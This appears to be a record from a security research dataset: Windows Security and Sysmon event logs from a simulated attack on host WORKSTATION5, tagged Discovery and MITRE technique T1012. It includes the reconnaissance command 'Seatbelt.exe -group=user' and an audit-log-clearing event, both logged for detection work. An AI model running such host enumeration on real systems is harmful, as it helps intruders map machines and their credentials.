Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\.NETFramework Handle ID: 0xb8 Resource Attributes: - Process Information: Process ID: 0x230c Process Name: C:\Users\wardog\Desktop || 12. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0xb8 Process Information: Process ID: 0x230c Process Name: C:\Users\wardog\Desktop\PurpleSharp.exe
100
OTRF-Security-Datasets-atomic
windows
WORKSTATION5
12
Discovery
T1012
2020-11-02T07:39:08.640000+03:00
2020-11-02T07:39:14.054000+03:00
1. The audit log was cleared. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Domain Name: WORKSTATION5 Logon ID: 0xC61D9 || 2. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: WORKGROUP Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x31c4 Process Information: Process ID: 0xd18 Process Name: C:\Windows\Sysmon.exe || 3. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: WORKGROUP Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SysmonDrv\Parameters Handle ID: 0x153c Resource Attributes: - Process Information: Process ID: 0xd18 Process Name: C:\Windows\Sysmon.exe Access Request || 4. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: WORKGROUP Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SysmonDrv\Parameters Handle ID: 0x153c Resource Attributes: - Process Information: Process ID: 0xd18 Process Name: C:\Windows\Sysmon.exe Access Requ || 5. Seatbelt.exe -group=user || 6. Seatbelt.exe -group=user || 7. RawAccessRead detected: RuleName: - UtcTime: 2020-11-02 21:39:11.676 ProcessGuid: {39e4a257-f121-5f8b-0100-000000000700} ProcessId: 4 Image: System Device: \Device\HarddiskVolume1 || 8. RawAccessRead detected: RuleName: - UtcTime: 2020-11-02 21:39:11.676 ProcessGuid: {39e4a257-f121-5f8b-0100-000000000700} ProcessId: 4 Image: System Device: \Device\HarddiskVolume3 || 9. RawAccessRead detected: RuleName: - UtcTime: 2020-11-02 21:39:11.676 ProcessGuid: {39e4a257-f121-5f8b-0100-000000000700} ProcessId: 4 Image: System Device: \Device\HarddiskVolume2 || 10. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x45c4 Process Information: Process ID: 0x2f04 Process Name: C:\Users\wardog\Desktop\Seatbelt.exe || 11. A handle to an object was requested. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\.NETFramework Handle ID: 0xa0 Resource Attributes: - Process Information: Process ID: 0x2f04 Process Name: C:\Users\wardog\Desktop || 12. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0xa0 Process Information: Process ID: 0x2f04 Process Name: C:\Users\wardog\Desktop\Seatbelt.exe